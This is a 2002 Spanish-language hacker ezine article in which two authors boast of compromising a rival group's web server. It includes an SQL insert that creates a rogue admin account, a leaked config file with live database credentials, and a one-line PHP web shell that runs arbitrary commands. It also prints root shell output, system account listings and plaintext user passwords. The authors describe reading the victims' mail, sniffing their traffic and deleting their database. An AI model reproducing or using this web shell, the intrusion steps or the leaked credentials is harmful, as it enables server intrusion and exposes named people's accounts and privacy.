eko nº4:(Eko#04PD-07.txt):11/07/2002 << Back To eko nº 4
<-[-]-[-]-[E]-[Z]-[K]-[R]-[A]-[C]-[H]-[O]-[ ]-[T]-[E]-[A]-[M]-[-]-[-]-> > Eko Magazine #04 Post Devaluation, La Odisea del Patacon 2002 < <------ [ RicoTuco y PoCaPiLa ] ------ [ losmafiosos@desiempre.esk ] -> > La Venganza del Oso Arturo Parte I < Presenta: Phreaking Arpac Eniac de Delphi. Bueeeeennaaassssssss!!!!! RicoTuco y PocaPila atakan de nuevo!!! ;) no se la esperaban ehhhh ? anduve mucho tiempo desaparecido pero no podia faltar para la EKO Magazine number four... Este texto trata sobre unos kiddies llamados DtMF Group a los ke tiempo atras escuchamos llamarse la 'elite' argentina PUAJ!! ya de entrada decir algo asi nos parecio un comentario muy lamm0r pero kisimos darles una oportunidad y revisar su web para ver ke tan 'elite' eran, claro ke no habia nada ke valiera la pena, salvo esa ezine pedorra ke dejaron de hacerla hace como un a~io. Pero pensamos "por lo menos deben tener una buena seguridad" asi ke en ese momento DtMF fue el feliz ganador de un "free pentest" :P Les adelanto ke no vamos a dar detalles tecnicos de como hicimos tal o cual cosa, pero lo vamos a ir contando en general, ahhh y todo esto sucedio hace como 7 meses. Como todo el mundo empezamos pasandole el nmap al host y despues a toda la red, sin lograr muchos resultados. En un primer vistazo se podria decir que es un host y una red bastante segura, pero como sabemos bien nada es completamente seguro ;) Asi que seguimos investigando y dedicandole tiempo y a las dos semanas, obteniamos algunos resultados. Nos concentramos principalmente en los CGI porque no habia ningun servicio que sea exploiteable y no daba para hacer un brute force de los pass de los users. Lo primero que encontramos en el server de DtMF fue un CGI con el ke se podia leer archivos si se le daba la ubicacion especifica en que se encontraban, lo gracioso de esto es que encontramos el bug y lo aprovechamos sin saber que ya existia un advisory para eso, casi aparece el RicoPila Advisory #1 jejejeje gracias a este CGI conseguimos mucha informacion del servidor y de otras cositas interesantes. Tiempo atras a los de DtMF se les dio por hacer toda su web y un foro en PHP, pero al poco tiempo sacaron este foro porque estaba tan mal programado que con unos simples scripts se podia crear miles de usuarios por minuto y hacer spam de posts. La cuestion es que habian hecha una agradable interfaz en PHP, que por supuesto estaba oculta, parar poder administrar el foro y toda su web con las noticias bla bla bla... y ahora tenian todo con HTML pero dejaron todo la pagina vieja en PHP en un directorio oculto, asi que tras noches de investigacion encontramos este directorio y nos concentramos en ver de que forma se podia ejecutar algun query de SQL. Despues de ver como trabajaba ese codigo pedorro en PHP cambiando algunas variables pudimos crear un usuario como administrador, que si lo pasamos a codigo PHP seria algo asi: ---- "INSERT INTO b_usuario values('','ricotuco',md5('hax0r'),'default',2, '00/00/00 00:00:00')"; ---- Estos de DtMF son tan pillos, para crear un usuario comun ponian un "1" y para crear un usuario administrador ponian "2", lo pueden creer ? bueno, la cuestion es que como administrador se podia borrar usuarios, borrar o crear topicos en el foro y hasta crear noticias en la pagina principal, lastima que no hicimos esto cuando todavia tenian la web en PHP ejejjeeje Ya con un usuario administrador tambien habia una opcion para ejecutar querys de SQL y obviamente fue cuestion de tiempo para ownear la base de datos SQL y todo su codigo PHP... por ejemplo el archivo principal de configuracion de todo lo que es PHP era opciones.php: -- opciones.php -- <? /* ARCHIVO DE CONFIGURACION DEL asmboard $aplicacion : Nombre de la aplicacion (reemplaza aca con el nombre de tu sitio) $dbhost : Nombre del servidor donde esta alojada la base de datos $dbname : Nombre de la base de datos de $dbhost donde estan alojados la informacion del board. $dbuser : Nombre de usuario valido en la base de datos $dbpass : Password de $dbpass $max_art : Cantidad maxima de articulos que sale en las news. */ $aplicacion = "asmsite version 0.9.0 -- FOR INTERNAL USE ONLY -- DO NOT DISTRIBUTE"; $dbhost = "mysql.csoft.net"; $dbname = "catalina_dtmf"; $dbuser = "catalina_dtmf"; $dbpassword = "inxsroolz"; $max_art = 8; ?> -- opciones.php -- "FOR INTERNAL USE ONLY -- DO NOT DISTRIBUTE" jejejejejeje inxsroolz ? what a lame password... ja! y como usamos ese inxsroolz jejejejeje ;) Ya teniendo todo esto fue facil crear algo como esto: -- shell.php -- <? system("$cmd 2>&1"); ?> -- shell.php -- Y de esta forma poder ejecutar comandos en el servidor de DtMF, claro que era una interfaz de shell con los permisos de usuario del Apache (www:users) pero una vez que pudimos ejecutar comandos en el server la suerte de DtMF ya estaba hechada... En los dias siguientes conseguimos una shell decente y al otro dia ya eramos root, por suerte estabamos suscriptos a Bugtraq y todo coincidio con el bug de los kernels nuevos de Linux justo antes de que lo actualizaran en el server, pero bue... eso no importa. root@leary# uname -a Linux leary 2.4.13 #10 SMP Fri Oct 26 06:32:50 EDT 2001 i686 unknown root@leary# ls -l total 1856 drwxr-x--- 30 catalina users 4096 Sep 6 01:08 . drwx--x--x 37 catalina users 4096 Oct 8 00:57 .. drwxr-xr-x 13 catalina users 4096 Jun 15 01:57 OLD.DTMF.COM.AR.SITIO.NO.BORRAR drwxr-x--- 5 catalina users 4096 Nov 6 2000 archive -rw-r----- 1 catalina users 194 Nov 6 2000 archive.tar.gz drwxr-x--- 2 catalina users 4096 Oct 30 2000 asmadmin drwxr-x--- 2 catalina users 4096 Oct 30 2000 asmboard drwxr-xr-x 2 catalina users 4096 Nov 27 2000 bookz.dtmf.com.ar drwxr-xr-x 2 catalina users 4096 Nov 13 2000 brainoverflow.com.ar drwxr-xr-x 2 catalina users 4096 May 2 22:20 brancaconcoca.com.ar lrwxrwxrwx 1 catalina users 19 Jul 6 02:22 catalina.csoft.net -> -rw-r----- 1 catalina users 2233 Nov 18 2000 contact.php drwxr-x--- 4 catalina users 4096 Jun 17 23:17 crew drwxr-xr-x 2 catalina users 4096 Nov 20 2000 d-h-c.com.ar drwxr-xr-x 4 catalina users 4096 Feb 23 2001 dar drwxr-xr-x 2 catalina users 4096 Feb 23 2001 darknet.dtmf.com.ar -rw-r----- 1 catalina users 176 Sep 27 2000 data.php drwxr-x--- 2 catalina users 4096 Dec 13 2000 digitalrebel lrwxrwxrwx 1 catalina users 38 Jul 6 02:09 digitalrebel.org.ar -> drwxr-xr-x 8 catalina users 4096 Oct 7 00:02 dtmf.com.ar drwxr-xr-x 2 catalina users 4096 Nov 20 2000 dtmf.org.ar drwxr-xr-x 8 catalina users 4096 Dec 15 2000 dtmfsite0.8 -rw-r----- 1 catalina users 2366 Sep 27 2000 encuesta.php -rw-r----- 1 catalina users 5222 Sep 27 2000 encuestares.php -rwxr-x--x 1 catalina users 13552 Dec 24 2000 fortune drwxr-xr-x 2 catalina users 4096 Nov 18 2000 hackadekarton.com.ar -rw-r----- 1 catalina users 2170 Oct 30 2000 header.php -rw-r----- 1 catalina users 31741 Dec 24 2000 heh -rw-r----- 1 catalina users 712 Dec 24 2000 heh.dat lrwxrwxrwx 1 catalina users 51 Jul 6 02:09 heh.org.ar -> -rw-r--r-- 1 catalina users 967 Nov 13 2000 index.html -rw-r----- 1 catalina users 5987 Feb 23 2001 index.php -rw-r----- 1 catalina users 1114 Aug 18 18:36 index2.html -rw-r----- 1 catalina users 987 Oct 23 2000 indexold.html -rw-r----- 1 catalina users 985 Sep 27 2000 ingresar.php -rw-r----- 1 catalina users 739 Sep 27 2000 iniciomain.php -rw-r----- 1 catalina users 1979 Nov 5 2000 initdb.sql drwxr-xr-x 2 catalina users 4096 Nov 14 2000 irc.dtmf.com.ar drwxr-xr-x 2 catalina users 4096 Nov 14 2000 irc.hackadekarton.com.ar -rw-r----- 1 catalina users 2130 Sep 27 2000 irforo.php drwxr-xr-x 9 catalina users 4096 Jul 18 01:29 kebracho.dtmf.com.ar drwxr-xr-x 7 catalina users 4096 Sep 3 02:54 kebrachohq.com.ar drwx------ 2 catalina users 4096 Oct 20 03:00 logs drwxr-xr-x 2 catalina users 4096 Feb 22 2001 lugmendoza.org.ar drwxr-xr-x 7 catalina users 4096 Aug 29 21:48 musicadance.com.ar -rw-r----- 1 catalina users 742 Nov 14 2000 opciones.php drwxr-xr-x 2 catalina users 4096 Apr 25 15:44 radeopirate.dtmf.com.ar drwxr-xr-x 2 catalina users 4096 Apr 25 15:44 radio.dtmf.com.ar drwxr-xr-x 2 catalina users 4096 Feb 22 2001 shell.org.ar drwxr-xr-x 2 catalina users 4096 Jan 4 2001 temp -rw-r--r-- 1 catalina users 1647660 Dec 15 2000 tocopy.tar.gz drwxr-xr-x 2 catalina users 4096 Feb 22 2001 webalizer lrwxrwxrwx 1 catalina users 33 Jul 6 02:09 www.asy.dtmf.com.ar -> lrwxrwxrwx 1 catalina users 35 Jul 6 02:09 www.bookz.dtmf.com.ar -> lrwxrwxrwx 1 catalina users 38 Jul 6 02:09 www.brainoverflow.com.ar -> lrwxrwxrwx 1 catalina users 38 Jul 6 02:09 www.brancaconcoca.com.ar -> lrwxrwxrwx 1 catalina users 38 Jul 6 02:22 www.catalina.csoft.net -> lrwxrwxrwx 1 catalina users 30 Jul 6 02:09 www.d-h-c.com.ar -> lrwxrwxrwx 1 catalina users 37 Jul 6 02:09 www.darknet.dtmf.com.ar -> lrwxrwxrwx 1 catalina users 37 Jul 6 02:09 www.digitalrebel.org.ar -> lrwxrwxrwx 1 catalina users 29 Jul 6 02:09 www.dtmf.com.ar -> lrwxrwxrwx 1 catalina users 29 Jul 6 02:09 www.dtmf.org.ar -> lrwxrwxrwx 1 catalina users 33 Jul 6 02:09 www.ethernet.org.ar -> lrwxrwxrwx 1 catalina users 38 Jul 6 02:09 www.hackadekarton.com.ar -> lrwxrwxrwx 1 catalina users 28 Jul 6 02:09 www.heh.org.ar -> lrwxrwxrwx 1 catalina users 33 Jul 6 02:09 www.irc.dtmf.com.ar -> lrwxrwxrwx 1 catalina users 42 Jul 6 02:09 www.irc.hackadekarton.com.ar -> lrwxrwxrwx 1 catalina users 38 Jul 6 02:09 www.kebracho.dtmf.com.ar -> lrwxrwxrwx 1 catalina users 35 Jul 6 02:09 www.kebrachohq.com.ar -> lrwxrwxrwx 1 catalina users 35 Jul 6 02:09 www.lugmendoza.org.ar -> lrwxrwxrwx 1 catalina users 38 Aug 23 16:55 www.musicadance.com.ar -> lrwxrwxrwx 1 catalina users 41 Jul 6 02:09 www.radeopirate.dtmf.com.ar -> lrwxrwxrwx 1 catalina users 35 Jul 6 02:09 www.radio.dtmf.com.ar -> lrwxrwxrwx 1 catalina users 30 Jul 6 02:09 www.shell.org.ar -> Editamos un poco el output porke no entraba. Como veran la gente de DtMF da hosting a muchas paginitas, entre ellas se encuentran sus hermanitos de Kebracho Team. Tambien pueden ver el directorio "asmboard" donde estaba el foro en PHP y el directorio *oculto* "asmadmin" jejeje donde estaba la interfaz para administrar toda la pagina y el foro. Los de DtMF fueron muy gentiles en dejarnos en el archivo que aparece como "tocopy.tar.gz" todo el source completo del foro y la pagina en PHP, un codigo muy pedorro la verdad, pero creo que eso ya lo dijimos. Tambien habia por alli un subdirectorio oculto llamado "bases" donde habian puesto bases de datos que habian sacado de unos sitios, seguramente los sacaron con el poderoso unicode bug jekejejejej pero de todas formas las bases nos vinieron bien... gracias DtMF jeje A todo esto ya teniamos preparado un mass defacement de todas las paginas que tienen en ese server, pero pronto nos dimos cuenta ke era mucho mas divertido leerles los mails y sniffearlos el server jejejeej Estas son algunas de las cuentas del sistema y las cuentas de mail con las que nos estuvimos divirtiendo en estos ultimos meses: catalina:x:1516:100::/home3/catalina:/bin/bash hehzine:x:2314:100::/home3/catalina/hehzine:/bin/poponly nolimits:x:2318:100::/home3/catalina/nolimits:/bin/poponly asy0:x:2319:100::/home3/catalina/asy0:/bin/poponly line:x:2313:100::/home3/catalina/line:/bin/poponly zomba:x:2320:100::/home3/catalina/zomba:/bin/poponly pescad0r:x:2321:100::/home3/catalina/pescad0r:/bin/poponly drsec:x:2326:100::/home3/catalina/drsec:/bin/poponly power:x:2562:100::/home3/catalina/power:/bin/poponly grayfox:x:2563:100::/home3/catalina/grayfox:/bin/poponly lpk0:x:2564:100::/home3/catalina/lpk0:/bin/poponly morpheus:x:2565:100::/home3/catalina/morpheus:/bin/poponly clothing:x:2657:100::/home3/catalina/clothing:/bin/poponly srtv:x:2785:100::/home3/catalina/srtv:/bin/poponly dklist:x:2800:100::/home3/catalina/dklist:/bin/poponly bugs:x:2972:100::/home3/catalina/bugs:/bin/poponly La unica cuenta con la que se logueaban era la llamada "catalina", alguna novia de los chicos de DtMF o simplemente un complejo de homosexualidad ? En esta parte del texto venia un compilado de 80kbytes de los mas comicos mails escritos y recibidos por DtMF jejej pero... la gente de Ezkracho nos pidio que los saquemos porque decian que eran cosas personales y no era etico... bue... finalmente los sacamos de este texto... tambien habia una foto privada de aSy al que se lo veia claramente con unos anteojos ridiculos pero tambien los tuvimos que sacar... y algunas cosas mas tambien... CENSURA LOCO!!!! :) Pero para que se diviertan aca estan los passwords de DtMF: User: aSy Pass: probabilistica User: nlm Pass: whynot User: line Pass: jxtojf Hay otras cuentas como las de line ke tambien funcionaban en la IgMP Book Library, bien pensado line, nos encanta la gente ke usa el mismo password en todos lados. Y ni hablar de los ke usaban el mismo password en algunas cuentas de shell y otras cositas, pero eso lo vamos a dejar para el proximo texto. Hasta la vista, RicoTuco y PoCaPiLa !! PD1: guarda con las cosas que se bajaron de DtMF porque tal vez alguien las backdoreo jejejej :P PD2: MovAX aprende a codear en PHP, tu codigo es horrible!! ya antes de ver el source encontramos buracos de seguridad por todos lados, para cuando lo vimos solo nos kedo cagarnos de risa de las boludeces ke haces. Bahh por esa razon es ke tuviste ke dar de baja el foro. PD3: por cierto les borramos toda la base de mysql pero si la necesitan pidanla que les hicimos un backup jejejej PD4: este hack va dedicado a aSy y su gran bocota. RicoTuco y PoCaPiLa, Febrero del 2002, Santiago del Estero. > Eko Magazine #04 Post Devaluation, La Odisea del Patacon 2002 < > La Venganza del Oso Arturo Parte I < [EOF]